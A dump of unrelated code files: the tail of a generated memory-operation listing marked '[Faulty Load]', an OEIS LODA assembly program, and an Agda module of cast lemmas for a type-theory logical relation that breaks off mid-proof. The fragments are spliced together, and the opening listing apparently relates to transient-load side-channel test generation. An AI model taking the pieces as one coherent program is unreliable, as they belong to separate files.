'addresses_WC', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_US', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 3}} {'src': {'type': 'addresses_A', 'congruent': 7, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC', 'congruent': 11, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 11}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'size': 8, 'NT': True, 'same': False, 'congruent': 10}} {'src': {'type': 'addresses_D', 'congruent': 11, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_PSE', 'congruent': 6, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_A', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 0}} {'OP': 'STOR', 'dst': {'type': 'addresses_P', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 2}} {'OP': 'STOR', 'dst': {'type': 'addresses_WT', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 9}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'size': 8, 'NT': False, 'same': True, 'congruent': 0}} {'src': {'type': 'addresses_WT', 'congruent': 9, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_PSE', 'congruent': 0, 'same': False}} {'src': {'type': 'addresses_WT', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 4}, 'OP': 'LOAD'} {'src': {'type': 'addresses_normal', 'congruent': 0, 'same': True}, 'OP': 'REPM', 'dst': {'type': 'addresses_US', 'congruent': 2, 'same': False}} [Faulty Load] {'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 2, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_A_ht', 'congruent': 7, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 8, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 5}} {'src': {'type': 'addresses_WC_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 3, 'same': False}} {'src': {'type': 'addresses_WT_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 7, 'same': False}} {'src': {'type': 'addresses_A_ht', 'AVXalign': True, 'size': 32, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 2}, 'OP': 'LOAD'} {'b8': 1} b8 */
programs/oeis/138/A138977.asm	neoneye/loda	22	161780	; A138977: Number of 2 X n matrices containing a 1 in the top left entry, all entries are integer values and adjacent entries differ by at most 1. ; 3,19,121,771,4913,31307,199497,1271251,8100769,51620379,328939577,2096095523,13356910353,85113990379,542370291241,3456136077171,22023471375233,140339755317947,894284401724697,5698631790801091,36313284928708849,231398467337757579,1474536131649467657,9396159052195243283,59874968838768832353,381540145662600853339,2431281144283130643961,15492807427331511094371,98724527414188055084753,629100462189990341215787,4008805125673180168171497,25545234030952299812337331,162781417713973378013675329,1037288987874004446846377979,6609897244262137615869944537,42120124758338945523704099843,268401284331324068202448920753,1710328491285912695322326045899,10898694301676092594446486638281,69449546146588997379836102284371,442552045819418611281066769437473,2820066136149574289448122976924827,17970254769769345581012593760723897,114511518843787121909295664417367971,729699612827432471041019275878680209 mov $1,6 mov $2,1 lpb $0 sub $0,1 add $2,$1 mul $1,2 add $1,$2 mul $1,2 lpe div $1,2 mov $0,$1
Definition/LogicalRelation/Substitution/Introductions/Castlemmas.agda	CoqHott/logrel-mltt	2	13032	{-# OPTIONS --safe #-} open import Definition.Typed.EqualityRelation module Definition.LogicalRelation.Substitution.Introductions.Castlemmas {{eqrel : EqRelSet}} where open EqRelSet {{...}} open import Definition.Untyped open import Definition.Untyped.Properties open import Definition.Typed open import Definition.Typed.Properties import Definition.Typed.Weakening as Twk open import Definition.Typed.EqualityRelation open import Definition.Typed.RedSteps open import Definition.LogicalRelation open import Definition.LogicalRelation.Irrelevance open import Definition.LogicalRelation.Properties open import Definition.LogicalRelation.Application open import Definition.LogicalRelation.Substitution import Definition.LogicalRelation.Weakening as Lwk open import Definition.LogicalRelation.Substitution.Properties import Definition.LogicalRelation.Substitution.Irrelevance as S open import Definition.LogicalRelation.Substitution.Reflexivity open import Definition.LogicalRelation.Substitution.Weakening -- open import Definition.LogicalRelation.Substitution.Introductions.Nat open import Definition.LogicalRelation.Substitution.Introductions.Empty -- open import Definition.LogicalRelation.Substitution.Introductions.Pi -- open import Definition.LogicalRelation.Substitution.Introductions.SingleSubst open import Definition.LogicalRelation.Substitution.Introductions.Universe open import Definition.LogicalRelation.Substitution.MaybeEmbed open import Tools.Product open import Tools.Empty import Tools.Unit as TU import Tools.PropositionalEquality as PE import Data.Nat as Nat module cast-ΠΠ-lemmas {Γ rF F F₁} (⊢Γ : ⊢ Γ) (⊢F : Γ ⊢ F ^ [ rF , ι ⁰ ]) ([F] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F ^ [ rF , ι ⁰ ]) (⊢F₁ : Γ ⊢ F₁ ^ [ rF , ι ⁰ ]) ([F₁] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ^ [ rF , ι ⁰ ]) (recursor : ∀ {x e ρ Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) e x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) (extrecursor : ∀ {ρ Δ x y e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x≡y] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) e x ≡ cast ⁰ (wk ρ F₁) (wk ρ F) e′ y ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) where b = λ ρ e x → cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x [b] : ∀ {ρ Δ e x} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ b ρ e x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ [b] [ρ] ⊢Δ ⊢e [x] = let ⊢e′ = Idsymⱼ (univ 0<1 ⊢Δ) (un-univ (escape ([F] [ρ] ⊢Δ))) (un-univ (escape ([F₁] [ρ] ⊢Δ))) ⊢e in recursor [ρ] ⊢Δ [x] ⊢e′ [bext] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ b ρ e x ≡ b ρ e′ y ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ [bext] [ρ] ⊢Δ ⊢e ⊢e′ [x] [y] [x≡y] = let ⊢syme = Idsymⱼ (univ 0<1 ⊢Δ) (un-univ (escape ([F] [ρ] ⊢Δ))) (un-univ (escape ([F₁] [ρ] ⊢Δ))) ⊢e ⊢syme′ = Idsymⱼ (univ 0<1 ⊢Δ) (un-univ (escape ([F] [ρ] ⊢Δ))) (un-univ (escape ([F₁] [ρ] ⊢Δ))) ⊢e′ in extrecursor [ρ] ⊢Δ [x] [y] [x≡y] ⊢syme ⊢syme′ module cast-ΠΠ-lemmas-2 {t e f Γ A B F rF G F₁ G₁} (⊢Γ : ⊢ Γ) (⊢A : Γ ⊢ A ^ [ ! , ι ⁰ ]) (⊢ΠFG : Γ ⊢ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒* Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F : Γ ⊢ F ^ [ rF , ι ⁰ ]) (⊢G : (Γ ∙ F ^ [ rF , ι ⁰ ]) ⊢ G ^ [ ! , ι ⁰ ]) (A≡A : Γ ⊢ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ≅ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F ^ [ rF , ι ⁰ ]) ([G] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G [ a ] ^ [ ! , ι ⁰ ])) (G-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G [ a ] ≡ wk (lift ρ) G [ b ] ^ [ ! , ι ⁰ ] / ([G] [ρ] ⊢Δ [a]))) (⊢B : Γ ⊢ B ^ [ ! , ι ⁰ ]) (⊢ΠF₁G₁ : Γ ⊢ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₁ : Γ ⊢ B ⇒* Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₁ : Γ ⊢ F₁ ^ [ rF , ι ⁰ ]) (⊢G₁ : (Γ ∙ F₁ ^ [ rF , ι ⁰ ]) ⊢ G₁ ^ [ ! , ι ⁰ ]) (A₁≡A₁ : Γ ⊢ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ≅ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₁] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ^ [ rF , ι ⁰ ]) ([G₁] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ])) (G₁-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ≡ wk (lift ρ) G₁ [ b ] ^ [ ! , ι ⁰ ] / ([G₁] [ρ] ⊢Δ [a]))) (⊢e : Γ ⊢ e ∷ Id (U ⁰) A B ^ [ % , ι ¹ ]) (recursor : ∀ {ρ Δ x y t e} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G [ x ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x]) (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) e t ∷ wk (lift ρ) G₁ [ y ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [y]) (extrecursor : ∀ {ρ Δ x x′ y y′ t t′ e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → ([x′] : Δ ⊩⟨ ι ⁰ ⟩ x′ ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → ([x≡x′] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ x′ ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y′] : Δ ⊩⟨ ι ⁰ ⟩ y′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y≡y′] : Δ ⊩⟨ ι ⁰ ⟩ y ≡ y′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G [ x ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x]) → ([t′] : Δ ⊩⟨ ι ⁰ ⟩ t′ ∷ wk (lift ρ) G [ x′ ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x′]) → ([t≡t′] : Δ ⊩⟨ ι ⁰ ⟩ t ≡ t′ ∷ wk (lift ρ) G [ x ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x]) → (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (U ⁰) (wk (lift ρ) G [ x′ ]) (wk (lift ρ) G₁ [ y′ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) e t ≡ cast ⁰ (wk (lift ρ) G [ x′ ]) (wk (lift ρ) G₁ [ y′ ]) e′ t′ ∷ wk (lift ρ) G₁ [ y ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [y]) (⊢t : Γ ⊢ t ∷ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (Df : Γ ⊢ t ⇒* f ∷ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ ι ⁰) ([fext] : ∀ {ρ Δ a b} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f ∘ a ^ ⁰ ≡ wk ρ f ∘ b ^ ⁰ ∷ wk (lift ρ) G [ a ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [a]) ([f] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f ∘ a ^ ⁰ ∷ wk (lift ρ) G [ a ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [a]) ([b] : ∀ {ρ Δ e x} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([bext] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x ≡ cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e′) y ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) where b = λ ρ e x → cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x ⊢IdFF₁ : Γ ⊢ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ⊢IdFF₁ = univ (Idⱼ (univ 0<1 ⊢Γ) (un-univ ⊢F) (un-univ ⊢F₁)) Δ₀ = Γ ∙ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ∙ wk1 F₁ ^ [ rF , ι ⁰ ] ρ₀ = (step (step id)) ⊢IdG₁G : Γ ∙ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ⊢ Π (wk1 F₁) ^ rF ° ⁰ ▹ Id (U ⁰) ((wk1d G) [ b ρ₀ (var 1) (var 0) ]↑) (wk1d G₁) ° ¹ ° ¹ ^ [ % , ι ¹ ] ⊢IdG₁G = let ⊢Δ₀ : ⊢ Δ₀ ⊢Δ₀ = ⊢Γ ∙ ⊢IdFF₁ ∙ univ (Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢IdFF₁) (un-univ ⊢F₁)) [ρ₀] : ρ₀ Twk.∷ Δ₀ ⊆ Γ [ρ₀] = Twk.step (Twk.step Twk.id) [0] : Δ₀ ⊩⟨ ι ⁰ ⟩ var 0 ∷ wk ρ₀ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ₀] ⊢Δ₀ [0] = let x = (var ⊢Δ₀ (PE.subst (λ X → 0 ∷ X ^ [ rF , ι ⁰ ] ∈ Δ₀) (wk1-wk (step id) F₁) here)) in neuTerm ([F₁] [ρ₀] ⊢Δ₀) (var 0) x (~-var x) ⊢1 : Δ₀ ⊢ (var 1) ∷ Id (Univ rF ⁰) (wk ρ₀ F) (wk ρ₀ F₁) ^ [ % , ι ¹ ] ⊢1 = var ⊢Δ₀ (PE.subst₂ (λ X Y → 1 ∷ Id (Univ rF ⁰) X Y ^ [ % , ι ¹ ] ∈ Δ₀) (wk1-wk (step id) F) (wk1-wk (step id) F₁) (there here)) ⊢G₀ : Δ₀ ⊢ wk (lift ρ₀) G [ b ρ₀ (var 1) (var 0) ] ^ [ ! , ι ⁰ ] ⊢G₀ = escape ([G] [ρ₀] ⊢Δ₀ ([b] [ρ₀] ⊢Δ₀ ⊢1 [0])) ⊢G₀′ = PE.subst (λ X → Δ₀ ⊢ X ^ [ ! , ι ⁰ ]) (PE.sym (cast-subst-lemma2 G (b ρ₀ (var 1) (var 0)))) ⊢G₀ x₀ : Δ₀ ⊢ Id (U ⁰) ((wk1d G) [ b ρ₀ (var 1) (var 0) ]↑) (wk1d G₁) ∷ SProp ¹ ^ [ ! , ∞ ] x₀ = Idⱼ (univ 0<1 ⊢Δ₀) (un-univ ⊢G₀′) (un-univ (Twk.wk (Twk.lift (Twk.step Twk.id)) ⊢Δ₀ ⊢G₁)) x₁ = Πⱼ <is≤ 0<1 ▹ ≡is≤ PE.refl ▹ Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢IdFF₁) (un-univ ⊢F₁) ▹ x₀ in univ x₁ ⊢e′ : Γ ⊢ e ∷ ∃ (Id (Univ rF ⁰) F F₁) ▹ (Π (wk1 F₁) ^ rF ° ⁰ ▹ Id (U ⁰) ((wk1d G) [ b ρ₀ (var 1) (var 0) ]↑) (wk1d G₁) ° ¹ ° ¹) ^ [ % , ι ¹ ] ⊢e′ = let b₀ = cast ⁰ (wk1 (wk1 F₁)) (wk1 (wk1 F)) (Idsym (Univ rF ⁰) (wk1 (wk1 F)) (wk1 (wk1 F₁)) (var 1)) (var 0) b≡b₀ : b ρ₀ (var 1) (var 0) PE.≡ b₀ b≡b₀ = PE.cong₂ (λ X Y → cast ⁰ Y X (Idsym (Univ rF ⁰) X Y (var 1)) (var 0)) (PE.sym (wk1-wk (step id) F)) (PE.sym (wk1-wk (step id) F₁)) x₀ = conv ⊢e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (un-univ≡ (subset* D)) (un-univ≡ (subset* D₁)))) x₁ = conv x₀ (univ (Id-U-ΠΠ (un-univ ⊢F) (un-univ ⊢G) (un-univ ⊢F₁) (un-univ ⊢G₁))) x₂ = PE.subst (λ X → Γ ⊢ e ∷ ∃ (Id (Univ rF ⁰) F F₁) ▹ (Π (wk1 F₁) ^ rF ° ⁰ ▹ Id (U ⁰) ((wk1d G) [ X ]↑) (wk1d G₁) ° ¹ ° ¹) ^ [ % , ι ¹ ]) (PE.sym b≡b₀) x₁ in x₂ ⊢fste : Γ ⊢ fst e ∷ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ⊢fste = fstⱼ (un-univ ⊢IdFF₁) (un-univ ⊢IdG₁G) ⊢e′ ⊢snde : Γ ⊢ snd e ∷ Π F₁ ^ rF ° ⁰ ▹ Id (U ⁰) (wk1d G [ b (step id) (fst (wk1 e)) (var 0) ]) G₁ ° ¹ ° ¹ ^ [ % , ι ¹ ] ⊢snde = let x₀ = sndⱼ (un-univ ⊢IdFF₁) (un-univ ⊢IdG₁G) ⊢e′ x₁ = PE.subst₂ (λ X Y → Γ ⊢ snd e ∷ (Π X ^ rF ° ⁰ ▹ subst _ (Id (U ⁰) Y (wk1d G₁)) ° ¹ ° ¹) ^ [ % , ι ¹ ]) (wk1-singleSubst F₁ (fst e)) (cast-subst-lemma2 G (b ρ₀ (var 1) (var 0))) x₀ x₂ = PE.subst₂ (λ X Y → Γ ⊢ snd e ∷ Π F₁ ^ rF ° ⁰ ▹ Id (U ⁰) X Y ° ¹ ° ¹ ^ [ % , ι ¹ ]) (singleSubstLift (wk (lift ρ₀) G) (b ρ₀ (var 1) (var 0))) (wk1d-singleSubst G₁ (fst e)) x₁ σ = liftSubst (sgSubst (fst e)) b≡b : subst σ (b ρ₀ (var 1) (var 0)) PE.≡ b (step id) (fst (wk1 e)) (var 0) b≡b = PE.trans (PE.cong (λ X → cast ⁰ (subst σ (wk ρ₀ F₁)) (subst σ (wk ρ₀ F)) X (var 0)) (subst-Idsym σ (Univ rF ⁰) (wk ρ₀ F) (wk ρ₀ F₁) (var 1))) (PE.cong₂ (λ X Y → cast ⁰ Y X (Idsym (Univ rF ⁰) X Y (fst (wk1 e))) (var 0)) (cast-subst-lemma5 F (fst e)) (cast-subst-lemma5 F₁ (fst e))) x₃ = PE.subst₂ (λ X Y → Γ ⊢ snd e ∷ Π F₁ ^ rF ° ⁰ ▹ Id (U ⁰) (X [ Y ]) G₁ ° ¹ ° ¹ ^ [ % , ι ¹ ]) (cast-subst-lemma3 G (fst e)) b≡b x₂ in x₃ ⊢snde′ : ∀ {ρ Δ x} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (⊢x : Δ ⊢ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ]) → Δ ⊢ snd (wk ρ e) ∘ x ^ ¹ ∷ Id (U ⁰) (wk (lift ρ) G [ b ρ (fst (wk ρ e)) x ]) (wk (lift ρ) G₁ [ x ]) ^ [ % , ι ¹ ] ⊢snde′ {ρ} {Δ} {x} [ρ] ⊢Δ ⊢x = let -- I should probably make some generic lemma about pushing weakening and subst in b y₀ = PE.trans (PE.cong (λ X → X [ x ]) (wk-Idsym (lift ρ) (Univ rF ⁰) (wk1 F) (wk1 F₁) (fst (wk1 e)))) (PE.trans (subst-Idsym (sgSubst x) (Univ rF ⁰) (wk (lift ρ) (wk1 F)) (wk (lift ρ) (wk1 F₁)) (fst (wk (lift ρ) (wk1 e)))) (PE.cong₃ (λ X Y Z → Idsym (Univ rF ⁰) X Y (fst Z)) (irrelevant-subst′ ρ F x) (irrelevant-subst′ ρ F₁ x) (irrelevant-subst′ ρ e x))) y₁ : wk (lift ρ) (b (step id) (fst (wk1 e)) (var 0)) [ x ] PE.≡ b ρ (fst (wk ρ e)) x y₁ = PE.cong₃ (λ X Y Z → cast ⁰ X Y Z x) (irrelevant-subst′ ρ 